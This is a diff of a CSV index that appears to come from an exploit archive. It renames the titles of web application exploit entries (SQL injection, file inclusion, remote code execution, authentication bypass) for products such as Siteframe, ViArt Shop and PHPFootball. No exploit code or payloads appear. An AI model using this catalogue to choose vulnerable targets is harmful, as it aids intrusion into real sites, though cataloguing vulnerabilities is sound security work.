 6096,platforms/php/webapps/6096.txt,"preCMS 1 - 'index.php' SQL Injection",2008-07-17,Mr.SQL,php,webapps,0
-6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-17,QTRinux,php,webapps,0
+6097,platforms/php/webapps/6097.txt,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-17,QTRinux,php,webapps,0
-6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.(1.0.4) - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0
+6098,platforms/php/webapps/6098.txt,"Aprox CMS Engine 5.1.0.4 - 'index.php' SQL Injection",2008-07-18,Mr.SQL,php,webapps,0
-6099,platforms/php/webapps/6099.txt,"Siteframe - 'folder.php id' SQL Injection",2008-07-18,n0ne,php,webapps,0
+6099,platforms/php/webapps/6099.txt,"Siteframe CMS 3.2.3 - 'folder.php' SQL Injection",2008-07-18,n0ne,php,webapps,0
-6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - (show.php) SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
+6102,platforms/php/webapps/6102.txt,"PHPFootball 1.6 - SQL Injection",2008-07-20,Mr.SQL,php,webapps,0
-6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - (info_book.asp book_id) Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
+6104,platforms/asp/webapps/6104.pl,"DigiLeave 1.2 - 'book_id' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
-6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'picture_pic_bv.asp key' Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
+6105,platforms/asp/webapps/6105.pl,"HRS Multi - 'key' Parameter Blind SQL Injection",2008-07-21,Mr.SQL,asp,webapps,0
 6107,platforms/php/webapps/6107.txt,"Interact 2.4.1 - 'help.php' Local File Inclusion",2008-07-21,DSecRG,php,webapps,0
 6108,platforms/cgi/webapps/6108.pl,"MojoClassifieds 2.0 - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
-6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - 'mojoClassified.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
+6109,platforms/cgi/webapps/6109.pl,"MojoPersonals - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
-6110,platforms/cgi/webapps/6110.pl,"MojoJobs - 'mojoJobs.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
+6110,platforms/cgi/webapps/6110.pl,"MojoJobs - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
-6111,platforms/cgi/webapps/6111.pl,"MojoAuto - 'mojoAuto.cgi mojo' Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
+6111,platforms/cgi/webapps/6111.pl,"MojoAuto - Blind SQL Injection",2008-07-21,Mr.SQL,cgi,webapps,0
-6112,platforms/php/webapps/6112.txt,"EZWebAlbum (dlfilename) - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0
+6112,platforms/php/webapps/6112.txt,"EZWebAlbum - Remote File Disclosure",2008-07-21,"Ghost Hacker",php,webapps,0
-6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - (index.php filter) SQL Injection",2008-07-21,ldma,php,webapps,0
+6113,platforms/php/webapps/6113.pl,"Arctic Issue Tracker 2.0.0 - 'filter' Parameter SQL Injection",2008-07-21,ldma,php,webapps,0
-6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0
+6114,platforms/php/webapps/6114.txt,"ShopCartDx 4.30 - 'pid' Parameter SQL Injection",2008-07-21,Cr@zy_King,php,webapps,0
 6115,platforms/php/webapps/6115.txt,"EZWebAlbum - Insecure Cookie Handling",2008-07-21,"Virangar Security",php,webapps,0
-6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - (Remote File Inclusion / SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-07-22,Unohope,php,webapps,0
+6117,platforms/php/webapps/6117.txt,"YouTube blog 0.1 - Remote File Inclusion / SQL Injection / Cross-Site Scripting",2008-07-22,Unohope,php,webapps,0
-6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'default.asp catid' SQL Injection",2008-07-22,DreamTurk,asp,webapps,0
+6119,platforms/asp/webapps/6119.txt,"Pre Survey Poll - 'catid' Parameter SQL Injection",2008-07-22,DreamTurk,asp,webapps,0
-6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - (photoId) SQL Injection",2008-07-24,Mr.SQL,php,webapps,0
+6125,platforms/php/webapps/6125.txt,"Atom Photoblog 1.1.5b1 - 'photoId' Parameter SQL Injection",2008-07-24,Mr.SQL,php,webapps,0
-6126,platforms/php/webapps/6126.txt,"ibase 2.03 - 'download.php' Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0
+6126,platforms/php/webapps/6126.txt,"ibase 2.03 - Remote File Disclosure",2008-07-24,Dyshoo,php,webapps,0
 6127,platforms/php/webapps/6127.htm,"WordPress Plugin Download Manager 0.2 - Arbitrary File Upload",2008-07-24,SaO,php,webapps,0
-6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' SQL Injection",2008-07-24,IRAQI,php,webapps,0
+6128,platforms/php/webapps/6128.txt,"Live Music Plus 1.1.0 - 'id' Parameter SQL Injection",2008-07-24,IRAQI,php,webapps,0
-6131,platforms/php/webapps/6131.txt,"xrms 1.99.2 - (Remote File Inclusion / Cross-Site Scripting / Information Gathering) Multiple Vulnerabilities",2008-07-25,AzzCoder,php,webapps,0
+6131,platforms/php/webapps/6131.txt,"XRms 1.99.2 - Remote File Inclusion / Cross-Site Scripting / Information Gathering",2008-07-25,AzzCoder,php,webapps,0
 6132,platforms/php/webapps/6132.txt,"Camera Life 2.6.2 - 'id' SQL Injection",2008-07-25,nuclear,php,webapps,0
-6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - (comment.php mid) SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
+6133,platforms/php/webapps/6133.txt,"FizzMedia 1.51.2 - SQL Injection",2008-07-25,Mr.SQL,php,webapps,0
-6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - (picture.php image_id) SQL Injection",2008-07-25,cOndemned,php,webapps,0
+6134,platforms/php/webapps/6134.txt,"PHPTest 0.6.3 - SQL Injection",2008-07-25,cOndemned,php,webapps,0
 6135,platforms/asp/webapps/6135.txt,"FipsCMS Light 2.1 - 'r' Parameter SQL Injection",2008-07-26,U238,asp,webapps,0
 6136,platforms/php/webapps/6136.txt,"PHPwebnews 0.2 MySQL Edition - (SQL) Insecure Cookie Handling",2008-07-26,"Virangar Security",php,webapps,0
 6137,platforms/php/webapps/6137.txt,"IceBB 1.0-RC9.2 - Blind SQL Injection / Session Hijacking Exploit",2008-07-26,girex,php,webapps,0
-6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
+6138,platforms/php/webapps/6138.txt,"Mobius 1.4.4.1 - SQL Injection",2008-07-26,dun,php,webapps,0
-6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' SQL Injection",2008-07-26,mikeX,php,webapps,0
+6139,platforms/php/webapps/6139.txt,"EPShop < 3.0 - 'pid' Parameter SQL Injection",2008-07-26,mikeX,php,webapps,0
 6140,platforms/php/webapps/6140.txt,"phpLinkat 0.1 - Insecure Cookie Handling / SQL Injection",2008-07-26,Encrypt3d.M!nd,php,webapps,0
-6141,platforms/php/webapps/6141.txt,"TriO 2.1 - (browse.php id) SQL Injection",2008-07-26,dun,php,webapps,0
+6141,platforms/php/webapps/6141.txt,"TriO 2.1 - 'browse.php' SQL Injection",2008-07-26,dun,php,webapps,0
-6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - (common.php bit) Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0
+6142,platforms/php/webapps/6142.txt,"CMScout 2.05 - 'bit' Parameter Local File Inclusion",2008-07-27,"Khashayar Fereidani",php,webapps,0
-6143,platforms/php/webapps/6143.txt,"Getacoder clone - (sb_protype) SQL Injection",2008-07-27,"Hussin X",php,webapps,0
+6143,platforms/php/webapps/6143.txt,"Getacoder clone - 'sb_protype' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0
-6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - (cate_id) SQL Injection",2008-07-27,"Hussin X",php,webapps,0
+6144,platforms/php/webapps/6144.txt,"GC Auction Platinum - 'cate_id' Parameter SQL Injection",2008-07-27,"Hussin X",php,webapps,0
-6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - (art) SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0
+6145,platforms/php/webapps/6145.txt,"SiteAdmin CMS - 'art' Parameter SQL Injection",2008-07-27,Cr@zy_King,php,webapps,0
 6146,platforms/php/webapps/6146.txt,"Pligg CMS 9.9.0 - 'story.php' SQL Injection",2008-07-28,"Hussin X",php,webapps,0
-6147,platforms/php/webapps/6147.txt,"Youtuber Clone - 'ugroups.php UID' SQL Injection",2008-07-28,"Hussin X",php,webapps,0
+6147,platforms/php/webapps/6147.txt,"Youtuber Clone - SQL Injection",2008-07-28,"Hussin X",php,webapps,0
 6148,platforms/php/webapps/6148.txt,"TalkBack 2.3.5 - 'Language' Local File Inclusion",2008-07-28,NoGe,php,webapps,0
 6149,platforms/php/webapps/6149.txt,"Dokeos E-Learning System 1.8.5 - Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
-6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - (language_full) Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
+6150,platforms/php/webapps/6150.txt,"PixelPost 1.7.1 - 'language_full' Parameter Local File Inclusion",2008-07-28,DSecRG,php,webapps,0
 6153,platforms/php/webapps/6153.txt,"ATutor 1.6.1-pl1 - 'import.php' Remote File Inclusion",2008-07-28,"Khashayar Fereidani",php,webapps,0
-6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - (category_id) SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0
+6154,platforms/php/webapps/6154.txt,"ViArt Shop 3.5 - 'category_id' Parameter SQL Injection",2008-07-28,"GulfTech Security",php,webapps,0
-6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Local File Inclusion",2008-07-29,DSecRG,php,webapps,0
+6156,platforms/php/webapps/6156.txt,"Minishowcase 09b136 - 'lang' Parameter Local File Inclusion",2008-07-29,DSecRG,php,webapps,0
 6158,platforms/php/webapps/6158.pl,"e107 Plugin BLOG Engine 2.2 - Blind SQL Injection",2008-07-29,"Virangar Security",php,webapps,0
-6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - rsargs[] SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0
+6159,platforms/php/webapps/6159.txt,"Gregarius 0.5.4 - SQL Injection",2008-07-29,"GulfTech Security",php,webapps,0
-6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - (admin.php rd) Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0
+6160,platforms/php/webapps/6160.txt,"PHP Hosting Directory 2.0 - Remote File Inclusion",2008-07-29,RoMaNcYxHaCkEr,php,webapps,0
-6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - (hioxRandomAd.php hm) Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0
+6161,platforms/php/webapps/6161.txt,"HIOX Random Ad 1.3 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0
-6162,platforms/php/webapps/6162.txt,"hiox browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0
+6162,platforms/php/webapps/6162.txt,"HIOX Browser Statistics 2.0 - Remote File Inclusion",2008-07-30,"Ghost Hacker",php,webapps,0
 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 - Insecure Cookie Handling",2008-07-30,Stack,php,webapps,0
-6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - (action_file) Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0
+6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 - 'action_file' Parameter Local File Inclusion",2008-07-30,"Khashayar Fereidani",php,webapps,0
-6165,platforms/php/webapps/6165.txt,"ZeeReviews - 'comments.php ItemID' SQL Injection",2008-07-30,Mr.SQL,php,webapps,0
+6165,platforms/php/webapps/6165.txt,"ZeeReviews - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0
 6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0
-6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - (Cat) SQL Injection",2008-07-30,Mr.SQL,php,webapps,0
+6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard - SQL Injection",2008-07-30,Mr.SQL,php,webapps,0
 6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin",2008-07-30,Stack,php,webapps,0
-6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' SQL Injection",2008-07-30,"Hussin X",php,webapps,0
+6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script - 'cid' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
-6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - (UID) SQL Injection",2008-07-30,"Hussin X",php,webapps,0
+6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script - 'UID' Parameter SQL Injection",2008-07-30,"Hussin X",php,webapps,0
 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) - SQL Injection",2008-07-30,Jack,php,webapps,0
 6172,platforms/php/webapps/6172.pl,"Pligg 9.9.0 - Remote Code Execution",2008-07-30,"GulfTech Security",php,webapps,0
-6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - (Cross-Site Scripting / Local File Inclusion / SQL Injection) Multiple Vulnerabilities",2008-07-30,"GulfTech Security",php,webapps,0
+6173,platforms/php/webapps/6173.txt,"pligg 9.9.0 - Cross-Site Scripting / Local File Inclusion / SQL Injection",2008-07-30,"GulfTech Security",php,webapps,0
 6176,platforms/php/webapps/6176.txt,"PHPX 3.5.16 - Cookie Poisoning / Login Bypass",2008-07-31,gnix,php,webapps,0
 6177,platforms/php/webapps/6177.php,"Symphony 1.7.01 - (non-patched) Remote Code Execution",2008-07-31,Raz0r,php,webapps,0
 6178,platforms/php/webapps/6178.php,"Coppermine Photo Gallery 1.4.18 - Local File Inclusion / Remote Code Execution",2008-07-31,EgiX,php,webapps,0
@@ -19606,7 +19609,7 @@ id,file,description,date,author,platform,type,port
 6707,platforms/php/webapps/6707.txt,"Gforge 4.5.19 - Multiple SQL Injections",2008-10-09,beford,php,webapps,0
 6708,platforms/php/webapps/6708.txt,"Gforge 4.6 rc1 - (skill_edit) SQL Injection",2008-10-09,beford,php,webapps,0
 6709,platforms/php/webapps/6709.txt,"Joomla! Component Joomtracker 1.01 - SQL Injection",2008-10-09,rsauron,php,webapps,0
-6710,platforms/php/webapps/6710.txt,"camera life 2.6.2b4 - (SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2008-10-09,BackDoor,php,webapps,0
+6710,platforms/php/webapps/6710.txt,"camera Life 2.6.2b4 - SQL Injection / Cross-Site Scripting",2008-10-09,BackDoor,php,webapps,0
 6711,platforms/php/webapps/6711.htm,"Kusaba 1.0.4 - Remote Code Execution (2)",2008-10-09,Sausage,php,webapps,0
 6712,platforms/php/webapps/6712.txt,"IranMC Arad Center - 'news.php id' SQL Injection",2008-10-09,"Hussin X",php,webapps,0
 6713,platforms/php/webapps/6713.txt,"Scriptsez Mini Hosting Panel - 'members.php' Local File Inclusion",2008-10-09,JosS,php,webapps,0
@@ -19924,7 +19927,7 @@ id,file,description,date,author,platform,type,port
 7097,platforms/php/webapps/7097.txt,"Joomla! Component com_marketplace 1.2.1 - 'catid' SQL Injection",2008-11-11,TR-ShaRk,php,webapps,0
 7098,platforms/php/webapps/7098.txt,"PozScripts Business Directory Script - 'cid' SQL Injection",2008-11-11,"Hussin X",php,webapps,0
 7101,platforms/php/webapps/7101.txt,"Alstrasoft SendIt Pro - Arbitrary File Upload",2008-11-12,ZoRLu,php,webapps,0
-7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0
+7102,platforms/php/webapps/7102.txt,"Alstrasoft Article Manager Pro 1.6 - Authentication Bypass",2008-11-12,ZoRLu,php,webapps,0
 7103,platforms/php/webapps/7103.txt,"Alstrasoft Web Host Directory - (Authentication Bypass) SQL Injection",2008-11-12,ZoRLu,php,webapps,0
 7105,platforms/php/webapps/7105.txt,"Quick Poll Script - 'code.php id' SQL Injection",2008-11-12,"Hussin X",php,webapps,0
 7106,platforms/php/webapps/7106.txt,"TurnkeyForms Local Classifieds - Authentication Bypass",2008-11-12,G4N0K,php,webapps,0
@@ -20339,12 +20342,12 @@ id,file,description,date,author,platform,type,port
 7625,platforms/php/webapps/7625.txt,"CMScout 2.06 - SQL Injection / Local File Inclusion",2008-12-30,SirGod,php,webapps,0
 7626,platforms/php/webapps/7626.txt,"Mole Group Vacation Estate Listing Script - (editid1) Blind SQL Injection",2008-12-30,x0r,php,webapps,0
 7627,platforms/asp/webapps/7627.txt,"Pixel8 Web Photo Album 3.0 - SQL Injection",2008-12-30,AlpHaNiX,asp,webapps,0
-7628,platforms/php/webapps/7628.txt,"viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
+7628,platforms/php/webapps/7628.txt,"Viart shopping cart 3.5 - Multiple Vulnerabilities",2009-01-01,"Xia Shing Zee",php,webapps,0
 7629,platforms/php/webapps/7629.txt,"DDL-Speed Script - (acp/backup) Admin Backup Bypass",2009-01-01,tmh,php,webapps,0
 7631,platforms/php/webapps/7631.txt,"2Capsule - 'sticker.php id' SQL Injection",2009-01-01,Zenith,php,webapps,0
 7633,platforms/php/webapps/7633.txt,"EggBlog 3.1.10 - Cross-Site Request Forgery (Change Admin Password)",2009-01-01,x0r,php,webapps,0
 7635,platforms/php/webapps/7635.txt,"ASPThai.Net WebBoard 6.0 - (bview.asp) SQL Injection",2009-01-01,DaiMon,php,webapps,0
-7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - (filter.php) Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
+7636,platforms/php/webapps/7636.pl,"PHPFootball 1.6 - Remote Hash Disclosure",2009-01-01,KinG-LioN,php,webapps,0
 7638,platforms/php/webapps/7638.txt,"Memberkit 1.0 - Remote Arbitrary .PHP File Upload",2009-01-01,Lo$er,php,webapps,0
 7639,platforms/php/webapps/7639.txt,"phpScribe 0.9 - (user.cfg) Remote Config Disclosure",2009-01-01,ahmadbady,php,webapps,0
 7640,platforms/php/webapps/7640.txt,"w3blabor CMS 3.3.0 - (Authentication Bypass) SQL Injection",2009-01-01,DNX,php,webapps,0
@@ -21232,8 +21235,8 @@ id,file,description,date,author,platform,type,port
 9091,platforms/php/webapps/9091.php,"Mlffat 2.2 - Blind SQL Injection",2009-07-09,Qabandi,php,webapps,0
 9092,platforms/php/webapps/9092.txt,"webasyst shop-script - (Blind SQL Injection / Cross-Site Scripting) Multiple Vulnerabilities",2009-07-09,Vrs-hCk,php,webapps,0
 9094,platforms/php/webapps/9094.txt,"EasyVillaRentalSite - 'id' SQL Injection",2009-07-09,BazOka-HaCkEr,php,webapps,0
-9095,platforms/php/webapps/9095.txt,"talkback 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0
+9095,platforms/php/webapps/9095.txt,"TalkBack 2.3.14 - Multiple Vulnerabilities",2009-07-09,JIKO,php,webapps,0
-9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - (SQL Injection / phpinfo()) Multiple Vulnerabilities",2009-07-09,NoGe,php,webapps,0
+9098,platforms/php/webapps/9098.txt,"Siteframe CMS 3.2.x - SQL Injection / phpinfo()",2009-07-09,NoGe,php,webapps,0
 9099,platforms/php/webapps/9099.pl,"Universe CMS 1.0.6 - (vnews.php id) SQL Injection",2009-07-09,Mr.tro0oqy,php,webapps,0
 9101,platforms/php/webapps/9101.txt,"phpbms 0.96 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
 9103,platforms/php/webapps/9103.txt,"gencms 2006 - Multiple Vulnerabilities",2009-07-10,eLwaux,php,webapps,0
@@ -23256,7 +23259,7 @@ id,file,description,date,author,platform,type,port
 12798,platforms/php/webapps/12798.txt,"Webiz - SQL Injection",2010-05-29,kannibal615,php,webapps,0
 12801,platforms/php/webapps/12801.txt,"osCommerce Online Merchant 2.2 - File Disclosure / Authentication Bypass",2010-05-30,Flyff666,php,webapps,0
 12805,platforms/php/webapps/12805.txt,"Zeeways Script - Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
-12806,platforms/php/webapps/12806.txt,"CMScout - (Cross-Site Scripting / HTML Injection) Multiple Vulnerabilities",2010-05-30,XroGuE,php,webapps,0
+12806,platforms/php/webapps/12806.txt,"CMScout - Cross-Site Scripting / HTML Injection",2010-05-30,XroGuE,php,webapps,0
 12807,platforms/php/webapps/12807.txt,"Creato Script - SQL Injection",2010-05-30,Mr.P3rfekT,php,webapps,0
 12808,platforms/php/webapps/12808.txt,"PTC Site's - Remote Code Execution / Cross-Site Scripting",2010-05-30,CrazyMember,php,webapps,0
 12809,platforms/php/webapps/12809.txt,"Symphony CMS - Local File Inclusion",2010-05-30,AntiSecurity,php,webapps,0
@@ -23537,7 +23540,7 @@ id,file,description,date,author,platform,type,port
 14274,platforms/php/webapps/14274.txt,"Joomla! Component 'Music Manager' - Local File Inclusion",2010-07-08,Sid3^effects,php,webapps,0
 14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
 14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
-14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - (products.php) Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
+14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
 14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
 14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
 14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0
@@ -24149,7 +24152,7 @@ id,file,description,date,author,platform,type,port
 15568,platforms/php/webapps/15568.py,"chCounter 3.1.3 - SQL Injection",2010-11-18,"Matias Fontanini",php,webapps,0
 15570,platforms/php/webapps/15570.php,"Joomla! Component 'com_mtree' 2.1.6 - Overwrite Cross-Site Request Forgery",2010-11-18,jdc,php,webapps,0
 15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
-15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
+15572,platforms/php/webapps/15572.txt,"ViArt Shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0
 15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - Cross-Site Request Forgery",2010-11-19,Or4nG.M4N,php,webapps,0
 15574,platforms/php/webapps/15574.txt,"Arabian YouTube Script - Blind SQL Injection",2010-11-19,R3d-D3V!L,php,webapps,0
 15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - Cross-Site Request Forgery (Change Admin Password)",2010-11-19,Or4nG.M4N,php,webapps,0
@@ -24292,7 +24295,7 @@ id,file,description,date,author,platform,type,port
 15848,platforms/php/webapps/15848.txt,"PHP-AddressBook 6.2.4 - (group.php) SQL Injection",2010-12-29,hiphop,php,webapps,0
 15849,platforms/php/webapps/15849.txt,"LoveCMS 1.6.2 - Cross-Site Request Forgery / Code Injection",2010-12-29,hiphop,php,webapps,0
 15850,platforms/php/webapps/15850.html,"PiXie CMS 1.04 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-12-29,"Ali Raheem",php,webapps,0
-15852,platforms/php/webapps/15852.txt,"Siteframe 3.2.3 - (user.php) SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0
+15852,platforms/php/webapps/15852.txt,"Siteframe CMS 3.2.3 - 'user.php' SQL Injection",2010-12-29,"AnGrY BoY",php,webapps,0
 15853,platforms/php/webapps/15853.txt,"DGNews 2.1 - SQL Injection",2010-12-29,kalashnikov,php,webapps,0
 15856,platforms/php/webapps/15856.php,"TYPO3 - Unauthenticated Arbitrary File Retrieval",2010-12-29,ikki,php,webapps,0
 15857,platforms/php/webapps/15857.txt,"Discovery TorrentTrader 2.6 - Multiple Vulnerabilities",2010-12-29,EsS4ndre,php,webapps,0
@@ -24338,7 +24341,7 @@ id,file,description,date,author,platform,type,port
 15987,platforms/cgi/webapps/15987.py,"SiteScape Enterprise Forum 7 - TCL Injection",2011-01-13,"Spencer McIntyre",cgi,webapps,0
 16020,platforms/php/webapps/16020.txt,"PHP Lowbids - viewfaqs.php Blind SQL Injection",2011-01-20,"BorN To K!LL",php,webapps,0
 15989,platforms/php/webapps/15989.txt,"Joomla! Component 'com_people' 1.0.0 - SQL Injection",2011-01-14,"Salvatore Fresta",php,webapps,0
-15993,platforms/php/webapps/15993.html,"viart shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
+15993,platforms/php/webapps/15993.html,"ViArt Shop 4.0.5 - Cross-Site Request Forgery",2011-01-15,Or4nG.M4N,php,webapps,0
 15995,platforms/php/webapps/15995.txt,"glfusion CMS 1.2.1 - 'img' Persistent Cross-Site Scripting",2011-01-15,Saif,php,webapps,0
 15996,platforms/php/webapps/15996.txt,"CompactCMS 1.4.1 - Multiple Vulnerabilities",2011-01-15,NLSecurity,php,webapps,0
 15997,platforms/jsp/webapps/15997.py,"MeshCMS 3.5 - Remote Code Execution",2011-01-16,mr_me,jsp,webapps,0
@@ -26054,9 +26057,8 @@ id,file,description,date,author,platform,type,port
 22380,platforms/cgi/webapps/22380.pl,"Smart Search 4.25 - Remote Command Execution",2003-01-05,knight420,cgi,webapps,0
 22382,platforms/php/webapps/22382.txt,"Mambo Site Server 4.0.10 - 'index.php' Cross-Site Scripting",2003-03-18,"Ertan Kurt",php,webapps,0
 22383,platforms/php/webapps/22383.txt,"Basit 1.0 Submit Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0
-22384,platforms/php/webapps/22384.txt,"Siteframe 2.2.4 - search.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0
 22385,platforms/php/webapps/22385.txt,"Basit 1.0 Search Module - Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0
-22386,platforms/php/webapps/22386.txt,"Siteframe 2.2.4 - download.php Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0
+22386,platforms/php/webapps/22386.txt,"Siteframe CMS 2.2.4 - 'download.php' Information Disclosure",2003-03-19,"Ertan Kurt",php,webapps,0
 22387,platforms/php/webapps/22387.txt,"DCP-Portal 5.3.1 - calendar.php Cross-Site Scripting",2003-03-19,"Ertan Kurt",php,webapps,0
 22389,platforms/php/webapps/22389.txt,"XOOPS 2.0 XoopsOption - Information Disclosure",2003-03-20,"gregory Le Bras",php,webapps,0
 22391,platforms/php/webapps/22391.txt,"osCommerce 2.1/2.2 - Error_Message Cross-Site Scripting",2003-03-20,"iProyectos group",php,webapps,0
@@ -26515,7 +26517,7 @@ id,file,description,date,author,platform,type,port
 23637,platforms/php/webapps/23637.txt,"Qualiteam X-Cart 3.x - upgrade.php perl_binary Parameter Arbitrary Command Execution",2004-02-03,Philip,php,webapps,0
 23639,platforms/php/webapps/23639.txt,"Qualiteam X-Cart 3.x - Multiple Remote Information Disclosure Vulnerabilities",2004-02-03,Philip,php,webapps,0
 23640,platforms/php/webapps/23640.txt,"phpMyAdmin 2.x - Export.php File Disclosure",2004-02-03,"Cedric Cochin",php,webapps,0
-23644,platforms/php/webapps/23644.php,"phpx 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0
+23644,platforms/php/webapps/23644.php,"PHPX 3.2.3 - Multiple Vulnerabilities",2004-02-03,"Manuel L?pez",php,webapps,0
 23645,platforms/php/webapps/23645.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showproduct.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23646,platforms/php/webapps/23646.txt,"All Enthusiast ReviewPost PHP Pro 2.5 - showcat.php SQL Injection",2004-02-04,G00db0y,php,webapps,0
 23647,platforms/cgi/webapps/23647.txt,"RXGoogle.CGI 1.0/2.5 - Cross-Site Scripting",2004-02-04,"Shaun Colley",cgi,webapps,0
@@ -26736,11 +26738,11 @@ id,file,description,date,author,platform,type,port
